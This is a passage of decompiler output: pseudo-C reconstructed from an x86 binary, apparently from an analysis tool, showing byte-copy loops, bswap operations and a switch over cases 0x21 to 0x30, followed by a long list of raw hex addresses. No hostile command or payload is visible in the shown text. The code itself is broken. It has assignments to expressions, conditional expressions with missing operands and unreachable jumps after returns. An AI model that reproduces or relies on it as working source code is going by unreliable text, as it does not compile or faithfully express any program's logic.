                                                                      									__edx = __ebp;
                                                                      									E10041550(__ebx + 0x90, __ebp) = __esi;
                                                                      									__esi & 0x0000007f = __esi & 0x0000007f ^ 0x00000070;
                                                                      									__eax = __esi & 0x0000007f ^ 0x00000070;
                                                                      									if((__esi & 0x0000007f ^ 0x00000070) != 0) {
                                                                      										goto L386;
                                                                      									}
                                                                      								}
                                                                      								L388:
                                                                      								__ebp = __esi;
                                                                      								__ebp = __esi & 0x0000007f;
                                                                      								 *(8 + __ebx) = __esi;
                                                                      								__esi = 0x80;
                                                                      								asm("adc edi, 0x0");
                                                                      								 *(__ebx + 0xc) = __edi;
                                                                      								__edx = 0x10 + __ebp;
                                                                      								__esi = 0x80 - __ebp;
                                                                      								if(0x80 <= 8) {
                                                                      									__edx = __edx + __ebx;
                                                                      									__ecx =  &(__esp[2]);
                                                                      									__edi = 0x80;
                                                                      									if(0x80 >= 4) {
                                                                      										if((__dl & 0x00000001) != 0) {
                                                                      											__eax = __esp[2] & 0x000000ff;
                                                                      											__ecx =  &(__esp[2]);
                                                                      											__edx = __edx + 1;
                                                                      											_t1169 = __esi - 1; // 0x7f
                                                                      											__edi = _t1169;
                                                                      											 *(__edx - 1) = __al;
                                                                      										}
                                                                      										if((__dl & 0x00000002) != 0) {
                                                                      											__eax =  *__ecx & 0x0000ffff;
                                                                      											__edx = __edx + 2;
                                                                      											__ecx = __ecx + 2;
                                                                      											__edi = __edi - 2;
                                                                      											 *(__edx - 2) = __ax;
                                                                      										}
                                                                      										if(__edi >= 4) {
                                                                      											__esp[1] = __ebp;
                                                                      											__eax = __edi;
                                                                      											__esp[0xc] = __ebx;
                                                                      											__eax = __edi & 0xfffffffc;
                                                                      											 *__esp = __edi & 0xfffffffc;
                                                                      											__eax = 0;
                                                                      											__ebp =  *__esp;
                                                                      											do {
                                                                      												__ebx =  *(__eax + __ecx);
                                                                      												 *(__eax + __edx) =  *(__eax + __ecx);
                                                                      												__eax = __eax + 4;
                                                                      											} while (__eax < __ebp);
                                                                      											__ebp = __esp[1];
                                                                      											__edx = __eax + __edx;
                                                                      											__ecx = __eax + __ecx;
                                                                      											__ebx = __esp[0xc];
                                                                      										}
                                                                      									}
                                                                      									__eax = 0;
                                                                      									if((__edi & 0x00000002) != 0) {
                                                                      										__eax =  *__ecx & 0x0000ffff;
                                                                      										__edi = __edi & 0x00000001;
                                                                      										 *__edx = __ax;
                                                                      										__eax = 2;
                                                                      										if(__edi != 0) {
                                                                      											goto L431;
                                                                      										}
                                                                      									} else {
                                                                      										if(__edi != 0) {
                                                                      											L431:
                                                                      											__ecx =  *(__eax + __ecx) & 0x000000ff;
                                                                      											 *(__eax + __edx) = __cl;
                                                                      										}
                                                                      									}
                                                                      									__edx = 0x10 + __ebx;
                                                                      									__ebp = __ebp - 0x78;
                                                                      									__ebx + 0x90 = E10041550(__ebx + 0x90, 0x10 + __ebx);
                                                                      									_t1129 = __esi + 8; // 0x88
                                                                      									__eax = _t1129;
                                                                      									__edx = 0x10;
                                                                      									__eax = _t1129 + __esp;
                                                                      								} else {
                                                                      									__eax =  &(__esp[2]);
                                                                      									__ebp = 8;
                                                                      								}
                                                                      								__ecx = __ebx + __edx;
                                                                      								if(__ebp >= 4) {
                                                                      									if((__cl & 0x00000001) != 0) {
                                                                      										__edx =  *__eax & 0x000000ff;
                                                                      										__ecx = __ecx + 1;
                                                                      										__eax = __eax + 1;
                                                                      										__ebp = __ebp - 1;
                                                                      										 *(__ecx - 1) = __dl;
                                                                      									}
                                                                      									if((__cl & 0x00000002) != 0) {
                                                                      										__edx =  *__eax & 0x0000ffff;
                                                                      										__ecx = __ecx + 2;
                                                                      										__eax = __eax + 2;
                                                                      										__ebp = __ebp - 2;
                                                                      										 *(__ecx - 2) = __dx;
                                                                      									}
                                                                      									if(__ebp >= 4) {
                                                                      										__esi = __ebp;
                                                                      										__edx = 0;
                                                                      										__esi = __ebp & 0xfffffffc;
                                                                      										do {
                                                                      											__edi =  *(__eax + __edx);
                                                                      											 *(__ecx + __edx) =  *(__eax + __edx);
                                                                      											__edx = __edx + 4;
                                                                      										} while (__edx < __esi);
                                                                      										__ecx = __ecx + __edx;
                                                                      										__eax = __eax + __edx;
                                                                      									}
                                                                      								}
                                                                      								__edx = 0;
                                                                      								if((__ebp & 0x00000002) != 0) {
                                                                      									__edx =  *__eax & 0x0000ffff;
                                                                      									__ebp = __ebp & 0x00000001;
                                                                      									 *__ecx = __dx;
                                                                      									__edx = 2;
                                                                      									if(__ebp == 0) {
                                                                      										goto L393;
                                                                      									} else {
                                                                      										goto L407;
                                                                      									}
                                                                      									L403:
                                                                      									__esp =  &(__esp[7]);
                                                                      									_pop(__ebx);
                                                                      									_pop(__esi);
                                                                      									_pop(__edi);
                                                                      									_pop(__ebp);
                                                                      									return __eax;
                                                                      									goto L457;
                                                                      								} else {
                                                                      									if(__ebp != 0) {
                                                                      										L407:
                                                                      										__eax =  *(__eax + __edx) & 0x000000ff;
                                                                      										 *(__ecx + __edx) = __al;
                                                                      									}
                                                                      								}
                                                                      								L393:
                                                                      								__eax =  *(8 + __ebx);
                                                                      								__edi = 0x80;
                                                                      								__edx =  *(__ebx + 0xc);
                                                                      								__esi = __eax;
                                                                      								__esi = __eax & 0x0000007f;
                                                                      								 *(8 + __ebx) = __eax;
                                                                      								asm("adc edx, 0x0");
                                                                      								__edi = 0x80 - __esi;
                                                                      								if(0x80 <= 8) {
                                                                      									__ebp = 0x80;
                                                                      									__edx = __esi + 0x10 + __ebx;
                                                                      									__ecx =  &(__esp[4]);
                                                                      									if(0x80 >= 4) {
                                                                      										if((__dl & 0x00000001) != 0) {
                                                                      											__eax = __esp[4] & 0x000000ff;
                                                                      											__ecx =  &(__esp[4]);
                                                                      											__edx = __edx + 1;
                                                                      											_t1163 = __edi - 1; // 0x7f
                                                                      											__ebp = _t1163;
                                                                      											 *(__edx - 1) = __al;
                                                                      										}
                                                                      										if((__dl & 0x00000002) != 0) {
                                                                      											__eax =  *__ecx & 0x0000ffff;
                                                                      											__edx = __edx + 2;
                                                                      											__ecx = __ecx + 2;
                                                                      											__ebp = __ebp - 2;
                                                                      											 *(__edx - 2) = __ax;
                                                                      										}
                                                                      										if(__ebp >= 4) {
                                                                      											__esp[1] = __esi;
                                                                      											__eax = __ebp;
                                                                      											__esp[0xc] = __ebx;
                                                                      											__eax = __ebp & 0xfffffffc;
                                                                      											 *__esp = __ebp & 0xfffffffc;
                                                                      											__eax = 0;
                                                                      											__esi =  *__esp;
                                                                      											do {
                                                                      												__ebx =  *(__eax + __ecx);
                                                                      												 *(__eax + __edx) =  *(__eax + __ecx);
                                                                      												__eax = __eax + 4;
                                                                      											} while (__eax < __esi);
                                                                      											__esi = __esp[1];
                                                                      											__edx = __eax + __edx;
                                                                      											__ecx = __eax + __ecx;
                                                                      											__ebx = __esp[0xc];
                                                                      										}
                                                                      									}
                                                                      									__eax = 0;
                                                                      									if((__ebp & 0x00000002) != 0) {
                                                                      										__eax =  *__ecx & 0x0000ffff;
                                                                      										__ebp = __ebp & 0x00000001;
                                                                      										 *__edx = __ax;
                                                                      										__eax = 2;
                                                                      										if(__ebp != 0) {
                                                                      											goto L434;
                                                                      										}
                                                                      									} else {
                                                                      										if(__ebp != 0) {
                                                                      											L434:
                                                                      											__ecx =  *(__eax + __ecx) & 0x000000ff;
                                                                      											 *(__eax + __edx) = __cl;
                                                                      										}
                                                                      									}
                                                                      									__edx = 0x10 + __ebx;
                                                                      									__ebx + 0x90 = E10041550(__ebx + 0x90, 0x10 + __ebx);
                                                                      									__eax =  &(__esp[4]);
                                                                      									__edx =  &(__esp[4]) + __edi;
                                                                      									__eax = __esi - 0x78;
                                                                      									__esi = 0x10;
                                                                      								} else {
                                                                      									__esi = __esi + 0x10;
                                                                      									__eax = 8;
                                                                      									__edx =  &(__esp[4]);
                                                                      								}
                                                                      								__esi = __esi + __ebx;
                                                                      								if(__eax >= 4) {
                                                                      									if((__esi & 0x00000001) != 0) {
                                                                      										__ecx =  *__edx & 0x000000ff;
                                                                      										__esi = __esi + 1;
                                                                      										__edx = __edx + 1;
                                                                      										__eax = __eax - 1;
                                                                      										 *(__esi - 1) = __cl;
                                                                      									}
                                                                      									if((__esi & 0x00000002) != 0) {
                                                                      										__edi =  *__edx & 0x0000ffff;
                                                                      										__esi = __esi + 2;
                                                                      										__edx = __edx + 2;
                                                                      										__eax = __eax - 2;
                                                                      										 *(__esi - 2) = __di;
                                                                      									}
                                                                      									if(__eax >= 4) {
                                                                      										__edi = __eax;
                                                                      										__ecx = 0;
                                                                      										__edi = __eax & 0xfffffffc;
                                                                      										do {
                                                                      											__ebp =  *(__edx + __ecx);
                                                                      											 *(__esi + __ecx) =  *(__edx + __ecx);
                                                                      											__ecx = __ecx + 4;
                                                                      										} while (__ecx < __edi);
                                                                      										__esi = __esi + __ecx;
                                                                      										__edx = __edx + __ecx;
                                                                      									}
                                                                      								}
                                                                      								__ecx = 0;
                                                                      								if((__al & 0x00000002) != 0) {
                                                                      									__edi =  *__edx & 0x0000ffff;
                                                                      									__ecx = 2;
                                                                      									 *__esi = __di;
                                                                      									if((__al & 0x00000001) == 0) {
                                                                      										goto L398;
                                                                      									} else {
                                                                      										goto L404;
                                                                      									}
                                                                      									goto L457;
                                                                      								} else {
                                                                      									if((__al & 0x00000001) != 0) {
                                                                      										L404:
                                                                      										__eax =  *(__edx + __ecx) & 0x000000ff;
                                                                      										 *(__esi + __ecx) = __al;
                                                                      									}
                                                                      								}
                                                                      								L398:
                                                                      								__edi = 0;
                                                                      								__ebp = 0;
                                                                      								if( *__ebx != 0) {
                                                                      									__edx = 0;
                                                                      									__ebp = __esp[0xd];
                                                                      									__eax = 0;
                                                                      									do {
                                                                      										__esi =  *(__ebx + 0x90 + __eax * 8);
                                                                      										__edi =  *(__ebx + 0x94 + __eax * 8);
                                                                      										asm("bswap esi");
                                                                      										 *(__ebp + 4 + __eax * 8) =  *(__ebx + 0x90 + __eax * 8);
                                                                      										asm("bswap edi");
                                                                      										 *(__ebp + __eax * 8) =  *(__ebx + 0x94 + __eax * 8);
                                                                      										__eax = __eax + 1;
                                                                      										__ecx =  *__ebx & 0x000000ff;
                                                                      										asm("adc edx, 0x0");
                                                                      										__edi = 0;
                                                                      										 *__esp = __cl;
                                                                      										__ecx = 0;
                                                                      										asm("sbb ecx, edi");
                                                                      									} while (__eax < ( *__ebx & 0x000000ff));
                                                                      									__esp[2] = __eax;
                                                                      									__ecx =  *__esp & 0x000000ff;
                                                                      									__esp[3] = 0;
                                                                      									if(__cl != 0) {
                                                                      										_t1089 = __eax + 0x12; // 0x11
                                                                      										__edx = _t1089;
                                                                      										__edi = __esp[0xd];
                                                                      										__ecx =  *(__ebx + 4 + _t1089 * 8);
                                                                      										__edx = __ecx;
                                                                      										__ebx = __ch & 0x000000ff;
                                                                      										__edx = __ecx << 8;
                                                                      										__edx = __ecx << 0x00000008 | __ch & 0x000000ff;
                                                                      										__ebx = __ecx;
                                                                      										__ebx = __ecx >> 8;
                                                                      										__ecx = __ecx >> 0x18;
                                                                      										__ebx = __ebx & 0x0000ff00;
                                                                      										__edx = __edx << 0x10;
                                                                      										 *(__esp[0xd] + __eax * 8) = __edx;
                                                                      									}
                                                                      								}
                                                                      								goto L403;
                                                                      							case 0x21:
                                                                      								__eax =  *(__eax + 0xc);
                                                                      								__eax =  !__eax;
                                                                      								asm("bswap eax");
                                                                      								 *__ecx = __eax;
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x22:
                                                                      								__eax =  *(__eax + 0xc);
                                                                      								asm("bswap eax");
                                                                      								 *__ecx = __eax;
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x23:
                                                                      								__esi =  &(__esp[4]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L131();
                                                                      								goto L50;
                                                                      							case 0x24:
                                                                      								__esi =  &(__esp[4]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L222();
                                                                      								goto L50;
                                                                      							case 0x25:
                                                                      								__esi =  &(__esp[4]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L272();
                                                                      								__ecx = __ebp;
                                                                      								__ecx =  <=  ? __ebx : __ebp;
                                                                      								__edi = __esp[0x1d];
                                                                      								if(__ecx < 8) {
                                                                      									goto L51;
                                                                      								} else {
                                                                      									goto L55;
                                                                      								}
                                                                      								goto L457;
                                                                      							case 0x26:
                                                                      								__esi =  &(__esp[4]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L325();
                                                                      								goto L50;
                                                                      							case 0x27:
                                                                      								__esi =  &(__esp[4]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L377();
                                                                      								goto L50;
                                                                      							case 0x28:
                                                                      								__eax =  *(__edx + 0xc);
                                                                      								__esi =  &(__esp[4]);
                                                                      								__eax =  !( *(__edx + 0xc));
                                                                      								asm("bswap eax");
                                                                      								__esp[4] =  !( *(__edx + 0xc));
                                                                      								goto L50;
                                                                      							case 0x29:
                                                                      								__eax =  *(__edx + 0xc);
                                                                      								asm("bswap eax");
                                                                      								__esp[4] =  *(__edx + 0xc);
                                                                      								__esi =  &(__esp[4]);
                                                                      								L50:
                                                                      								__ecx = __ebp;
                                                                      								__edi = __esp[0x1d];
                                                                      								__ecx =  <=  ? __ebx : __ebp;
                                                                      								if(__ecx >= 8) {
                                                                      									L55:
                                                                      									if((__edi & 0x00000001) != 0) {
                                                                      										__eax = __esp[4] & 0x000000ff;
                                                                      										__esi =  &(__esp[4]);
                                                                      										__ecx = __ecx - 1;
                                                                      										 *__edi = __al;
                                                                      										__eax = __esp[0x1d];
                                                                      										__edi = __esp[0x1d] + 1;
                                                                      									}
                                                                      									if((__edi & 0x00000002) != 0) {
                                                                      										__eax =  *__esi & 0x0000ffff;
                                                                      										__edi = __edi + 2;
                                                                      										__esi = __esi + 2;
                                                                      										__ecx = __ecx - 2;
                                                                      										 *(__edi - 2) = __ax;
                                                                      									}
                                                                      									if((__edi & 0x00000004) != 0) {
                                                                      										__eax =  *__esi;
                                                                      										__edi = __edi + 4;
                                                                      										__esi = __esi + 4;
                                                                      										__ecx = __ecx - 4;
                                                                      										 *(__edi - 4) = __eax;
                                                                      									}
                                                                      								}
                                                                      								L51:
                                                                      								__eax = memcpy(__edi, __esi, __ecx);
                                                                      								__esi + __ecx = __esi + __ecx + __ecx;
                                                                      								__ecx = 0;
                                                                      								if(__ebp < __ebx) {
                                                                      									__eax = __esp[0x1d];
                                                                      									__ebx = __ebx - __ebp;
                                                                      									__edi = __eax + __ebp;
                                                                      									if(__ebx >= 8) {
                                                                      										if((__edi & 0x00000001) != 0) {
                                                                      											 *__edi = 0;
                                                                      											__ebx = __ebx - 1;
                                                                      											__edi = __edi + 1;
                                                                      										}
                                                                      										if((__edi & 0x00000002) != 0) {
                                                                      											 *__edi = 0;
                                                                      											__ebx = __ebx - 2;
                                                                      											__edi = __edi + 2;
                                                                      										}
                                                                      										if((__edi & 0x00000004) != 0) {
                                                                      											 *__edi = 0;
                                                                      											__ebx = __ebx - 4;
                                                                      											__edi = __edi + 4;
                                                                      										}
                                                                      										__ecx = __ebx;
                                                                      										__eax = 0;
                                                                      										__ecx = __ebx >> 2;
                                                                      										__ebx = __ebx & 0x00000003;
                                                                      										__eax = memset(__edi, 0, __ecx << 2);
                                                                      										__edi = __edi + __ecx;
                                                                      										__ecx = 0;
                                                                      									}
                                                                      									if((__bl & 0x00000004) != 0) {
                                                                      										 *__edi = 0;
                                                                      										__edi = __edi + 4;
                                                                      									}
                                                                      									if((__bl & 0x00000002) != 0) {
                                                                      										 *__edi = 0;
                                                                      										__edi = __edi + 2;
                                                                      									}
                                                                      									if((__bl & 0x00000001) != 0) {
                                                                      										 *__edi = 0;
                                                                      									}
                                                                      								}
                                                                      								__ebx = __esp[0x17];
                                                                      								__esi = __esp[0x18];
                                                                      								__edi = __esp[0x19];
                                                                      								__ebp = __esp[0x1a];
                                                                      								__esp =  &(__esp[0x1b]);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x2a:
                                                                      								__esi =  &(__esp[5]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L131();
                                                                      								goto L81;
                                                                      							case 0x2b:
                                                                      								__esi =  &(__esp[5]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L222();
                                                                      								goto L81;
                                                                      							case 0x2c:
                                                                      								__esi =  &(__esp[5]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L272();
                                                                      								goto L81;
                                                                      							case 0x2d:
                                                                      								__esi =  &(__esp[5]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L325();
                                                                      								goto L81;
                                                                      							case 0x2e:
                                                                      								__esi =  &(__esp[5]);
                                                                      								__esp[1] = __esi;
                                                                      								__eax =  *__edx;
                                                                      								 *__esp =  *__edx;
                                                                      								L377();
                                                                      								goto L81;
                                                                      							case 0x2f:
                                                                      								__eax =  *(__edx + 0xc);
                                                                      								__esi =  &(__esp[5]);
                                                                      								__eax =  !( *(__edx + 0xc));
                                                                      								asm("bswap eax");
                                                                      								__esp[5] =  !( *(__edx + 0xc));
                                                                      								goto L81;
                                                                      							case 0x30:
                                                                      								__eax =  *(__edx + 0xc);
                                                                      								asm("bswap eax");
                                                                      								__esp[5] =  *(__edx + 0xc);
                                                                      								__esi =  &(__esp[5]);
                                                                      								L81:
                                                                      								__esp[2] = __esi;
                                                                      								__esi =  &(__esp[0x15]);
                                                                      								__eax = 0x59;
                                                                      								__esp[3] = __edi;
                                                                      								__esp[1] = 0x59;
                                                                      								 *__esp = __esi;
                                                                      								__eax = L100078D0();
                                                                      								__edx = __edi + 2;
                                                                      								__eax = 0xaaaaaaab;
                                                                      								_t125 = 0xaaaaaaab * __edx;
                                                                      								__edx = 0xaaaaaaab * __edx >> 0x20;
                                                                      								__eax = _t125;
                                                                      								__edi = __ebp;
                                                                      								__eax = 1 + __edx * 4;
                                                                      								__ecx = __eax;
                                                                      								__ecx =  <=  ? __ebx : __eax;
                                                                      								if(__ecx >= 8) {
                                                                      									if((__ebp & 0x00000001) != 0) {
                                                                      										__edx = __esp[0x15] & 0x000000ff;
                                                                      										__edi = __ebp + 1;
                                                                      										__ecx = __ecx - 1;
                                                                      										__esi =  &(__esp[0x16]);
                                                                      										 *__ebp = __dl;
                                                                      									}
                                                                      									if((__edi & 0x00000002) != 0) {
                                                                      										__edx =  *__esi & 0x0000ffff;
                                                                      										__edi = __edi + 2;
                                                                      										__esi = __esi + 2;
                                                                      										__ecx = __ecx - 2;
                                                                      										 *(__edi - 2) = __dx;
                                                                      									}
                                                                      									if((__edi & 0x00000004) != 0) {
                                                                      										__edx =  *__esi;
                                                                      										__edi = __edi + 4;
                                                                      										__esi = __esi + 4;
                                                                      										__ecx = __ecx - 4;
                                                                      										 *(__edi - 4) = __edx;
                                                                      									}
                                                                      								}
                                                                      								__eax = memcpy(__edi, __esi, __ecx);
                                                                      								__esi + __ecx = __esi + __ecx + __ecx;
                                                                      								__ecx = 0;
                                                                      								if(__ebx < __eax) {
                                                                      									 *((char*)(__ebp + __ebx - 1)) = 0;
                                                                      								}
                                                                      								__ebx = __esp[0x2f];
                                                                      								__esi = __esp[0x30];
                                                                      								__edi = __esp[0x31];
                                                                      								__ebp = __esp[0x32];
                                                                      								__esp =  &(__esp[0x33]);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				goto L457;
                                                                      			}













                                                                      0x100288cc
                                                                      0x100288d2
                                                                      0x100288d6
                                                                      0x100288d8
                                                                      0x100288dc
                                                                      0x100288df
                                                                      0x100288e4
                                                                      0x100288e7
                                                                      0x100288ec
                                                                      0x00000000
                                                                      0x100288ec
                                                                      0x10028815
                                                                      0x10028815
                                                                      0x10028818
                                                                      0x10028818
                                                                      0x1002881c
                                                                      0x1002881e
                                                                      0x10028826
                                                                      0x10028828
                                                                      0x1002882b
                                                                      0x10028848
                                                                      0x1002884c
                                                                      0x10028855
                                                                      0x10028858
                                                                      0x10028913
                                                                      0x100289dc
                                                                      0x100289df
                                                                      0x100289e0
                                                                      0x100289e1
                                                                      0x100289e4
                                                                      0x100289e4
                                                                      0x10028920
                                                                      0x100289c7
                                                                      0x100289ca
                                                                      0x100289cd
                                                                      0x100289d0
                                                                      0x100289d3
                                                                      0x100289d3
                                                                      0x10028929
                                                                      0x1002892f
                                                                      0x10028931
                                                                      0x10028933
                                                                      0x10028936
                                                                      0x10028936
                                                                      0x10028939
                                                                      0x1002893c
                                                                      0x1002893f
                                                                      0x10028943
                                                                      0x10028945
                                                                      0x10028945
                                                                      0x10028929
                                                                      0x1002885e
                                                                      0x10028862
                                                                      0x100288f8
                                                                      0x100288fd
                                                                      0x10028902
                                                                      0x10028905
                                                                      0x00000000
                                                                      0x1002890b
                                                                      0x10028868
                                                                      0x1002886a
                                                                      0x1002886c
                                                                      0x1002886c
                                                                      0x10028870
                                                                      0x10028870
                                                                      0x1002886a
                                                                      0x10028862
                                                                      0x1002882b
                                                                      0x1002882d
                                                                      0x10028831
                                                                      0x10028835
                                                                      0x10028839
                                                                      0x1002883d
                                                                      0x10028840
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001cb08
                                                                      0x1001cb0c
                                                                      0x1001cb10
                                                                      0x1001cb12
                                                                      0x1001cb16
                                                                      0x1001cb1a
                                                                      0x1002a1b0
                                                                      0x1002a1b1
                                                                      0x1002a1b2
                                                                      0x1002a1b3
                                                                      0x1002a1b4
                                                                      0x1002a1b7
                                                                      0x1002a1bb
                                                                      0x1002a1bf
                                                                      0x1002a1c3
                                                                      0x1002a1c5
                                                                      0x1002a1ca
                                                                      0x1002a1cd
                                                                      0x1002a1d0
                                                                      0x1002a1d4
                                                                      0x1002a1d7
                                                                      0x1002a1db
                                                                      0x1002a1df
                                                                      0x1002a6a0
                                                                      0x1002a6a0
                                                                      0x1002a6a3
                                                                      0x1002a6a4
                                                                      0x1002a6a5
                                                                      0x1002a6a6
                                                                      0x1002a6a7
                                                                      0x1002a1e5
                                                                      0x1002a1e5
                                                                      0x1002a1e9
                                                                      0x1002a1eb
                                                                      0x1002a1ee
                                                                      0x1002a1f1
                                                                      0x1002a1f6
                                                                      0x1002a532
                                                                      0x1002a532
                                                                      0x1002a536
                                                                      0x1002a539
                                                                      0x1002a53d
                                                                      0x1002a53f
                                                                      0x1002a545
                                                                      0x1002a54b
                                                                      0x1002a54e
                                                                      0x1002a550
                                                                      0x1002a554
                                                                      0x1002a558
                                                                      0x1002a560
                                                                      0x1002a560
                                                                      0x1002a563
                                                                      0x1002a568
                                                                      0x1002a56f
                                                                      0x1002a575
                                                                      0x1002a577
                                                                      0x1002a577
                                                                      0x1002a579
                                                                      0x1002a580
                                                                      0x1002a582
                                                                      0x1002a584
                                                                      0x1002a588
                                                                      0x1002a58c
                                                                      0x1002a590
                                                                      0x1002a593
                                                                      0x1002a597
                                                                      0x1002a59e
                                                                      0x1002a5a4
                                                                      0x1002a5a6
                                                                      0x1002a5a6
                                                                      0x1002a5a8
                                                                      0x1002a5aa
                                                                      0x1002a5ac
                                                                      0x1002a5b0
                                                                      0x1002a5b2
                                                                      0x1002a5b6
                                                                      0x1002a5b9
                                                                      0x1002a5bd
                                                                      0x1002a5c5
                                                                      0x1002a5c9
                                                                      0x1002a5d4
                                                                      0x1002a5d6
                                                                      0x1002a5db
                                                                      0x1002a5db
                                                                      0x1002a5df
                                                                      0x1002a5e1
                                                                      0x1002a5e3
                                                                      0x1002a5e5
                                                                      0x1002a5e7
                                                                      0x1002a5eb
                                                                      0x1002a5ef
                                                                      0x1002a5f3
                                                                      0x1002a5f7
                                                                      0x1002a5fa
                                                                      0x1002a5fa
                                                                      0x1002a5fc
                                                                      0x1002a5fe
                                                                      0x1002a600
                                                                      0x1002a602
                                                                      0x1002a606
                                                                      0x1002a60c
                                                                      0x1002a60f
                                                                      0x1002a61c
                                                                      0x1002a61e
                                                                      0x1002a623
                                                                      0x1002a623
                                                                      0x1002a626
                                                                      0x1002a628
                                                                      0x1002a62c
                                                                      0x1002a62e
                                                                      0x1002a632
                                                                      0x1002a634
                                                                      0x1002a636
                                                                      0x1002a63a
                                                                      0x1002a63e
                                                                      0x1002a640
                                                                      0x1002a642
                                                                      0x1002a645
                                                                      0x1002a645
                                                                      0x1002a647
                                                                      0x1002a64e
                                                                      0x1002a652
                                                                      0x1002a656
                                                                      0x1002a659
                                                                      0x1002a65d
                                                                      0x1002a660
                                                                      0x1002a668
                                                                      0x1002a66c
                                                                      0x1002a66f
                                                                      0x1002a673
                                                                      0x1002a677
                                                                      0x1002a67b
                                                                      0x1002a67b
                                                                      0x1002a67d
                                                                      0x1002a680
                                                                      0x1002a684
                                                                      0x1002a686
                                                                      0x1002a68a
                                                                      0x1002a68d
                                                                      0x1002a691
                                                                      0x1002a694
                                                                      0x1002a698
                                                                      0x1002a69b
                                                                      0x1002a69e
                                                                      0x1002a6b3
                                                                      0x1002a6b5
                                                                      0x1002a6b8
                                                                      0x1002a6f6
                                                                      0x1002a7b8
                                                                      0x1002a7bb
                                                                      0x1002a7be
                                                                      0x1002a7bf
                                                                      0x1002a7c2
                                                                      0x1002a7c2
                                                                      0x1002a702
                                                                      0x1002a7a3
                                                                      0x1002a7a6
                                                                      0x1002a7a9
                                                                      0x1002a7ac
                                                                      0x1002a7af
                                                                      0x1002a7af
                                                                      0x1002a70b
                                                                      0x1002a70d
                                                                      0x1002a710
                                                                      0x1002a712
                                                                      0x1002a714
                                                                      0x1002a717
                                                                      0x1002a717
                                                                      0x1002a71a
                                                                      0x1002a71d
                                                                      0x1002a720
                                                                      0x1002a724
                                                                      0x1002a727
                                                                      0x1002a729
                                                                      0x1002a729
                                                                      0x1002a70b
                                                                      0x1002a6ba
                                                                      0x1002a6c2
                                                                      0x1002a6c4
                                                                      0x1002a6c7
                                                                      0x1002a6ca
                                                                      0x1002a6ca
                                                                      0x1002a6d2
                                                                      0x1002a6d4
                                                                      0x1002a6d8
                                                                      0x1002a6d8
                                                                      0x1002a6db
                                                                      0x1002a6de
                                                                      0x1002a6e1
                                                                      0x1002a6e2
                                                                      0x1002a6e3
                                                                      0x1002a6e4
                                                                      0x1002a6e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1002a1fc
                                                                      0x1002a1ff
                                                                      0x1002a418
                                                                      0x1002a418
                                                                      0x1002a41b
                                                                      0x1002a420
                                                                      0x1002a427
                                                                      0x1002a42e
                                                                      0x1002a434
                                                                      0x1002a438
                                                                      0x1002a438
                                                                      0x1002a43a
                                                                      0x1002a441
                                                                      0x1002a443
                                                                      0x1002a445
                                                                      0x1002a449
                                                                      0x1002a44b
                                                                      0x1002a44f
                                                                      0x1002a453
                                                                      0x1002a456
                                                                      0x1002a45a
                                                                      0x1002a460
                                                                      0x1002a462
                                                                      0x1002a467
                                                                      0x1002a467
                                                                      0x1002a469
                                                                      0x1002a46b
                                                                      0x1002a46d
                                                                      0x1002a471
                                                                      0x1002a473
                                                                      0x1002a477
                                                                      0x1002a47b
                                                                      0x1002a47f
                                                                      0x1002a483
                                                                      0x1002a487
                                                                      0x1002a48d
                                                                      0x1002a493
                                                                      0x1002a497
                                                                      0x1002a49a
                                                                      0x1002a49f
                                                                      0x1002a49f
                                                                      0x1002a4a1
                                                                      0x1002a4a4
                                                                      0x1002a4a6
                                                                      0x1002a4a8
                                                                      0x1002a4aa
                                                                      0x1002a4ac
                                                                      0x1002a4b0
                                                                      0x1002a4b4
                                                                      0x1002a4b9
                                                                      0x1002a4bd
                                                                      0x1002a4c1
                                                                      0x1002a4c5
                                                                      0x1002a4c8
                                                                      0x1002a4c8
                                                                      0x1002a4ca
                                                                      0x1002a4ce
                                                                      0x1002a4d5
                                                                      0x1002a4d8
                                                                      0x1002a4db
                                                                      0x1002a4df
                                                                      0x1002a4e5
                                                                      0x1002a4eb
                                                                      0x1002a4ef
                                                                      0x1002a4f2
                                                                      0x1002a4f4
                                                                      0x1002a4f9
                                                                      0x1002a4f9
                                                                      0x1002a4fb
                                                                      0x1002a500
                                                                      0x1002a502
                                                                      0x1002a506
                                                                      0x1002a508
                                                                      0x1002a50a
                                                                      0x100411d9
                                                                      0x100411dc
                                                                      0x100411df
                                                                      0x100411e2
                                                                      0x100411e7
                                                                      0x100411e9
                                                                      0x100411ec
                                                                      0x100411f1
                                                                      0x10041280
                                                                      0x10041284
                                                                      0x1004128a
                                                                      0x1004128e
                                                                      0x10041356
                                                                      0x100413f1
                                                                      0x100413f4
                                                                      0x100413f4
                                                                      0x100413f7
                                                                      0x100413f8
                                                                      0x100413fb
                                                                      0x100413ff
                                                                      0x10041403
                                                                      0x10041403
                                                                      0x10041362
                                                                      0x100413da
                                                                      0x100413dd
                                                                      0x100413e0
                                                                      0x100413e3
                                                                      0x100413e7
                                                                      0x100413e7
                                                                      0x10041364
                                                                      0x1004136b
                                                                      0x10041371
                                                                      0x10041378
                                                                      0x1004137c
                                                                      0x1004137e
                                                                      0x10041382
                                                                      0x10041386
                                                                      0x10041386
                                                                      0x10041389
                                                                      0x1004138d
                                                                      0x10041390
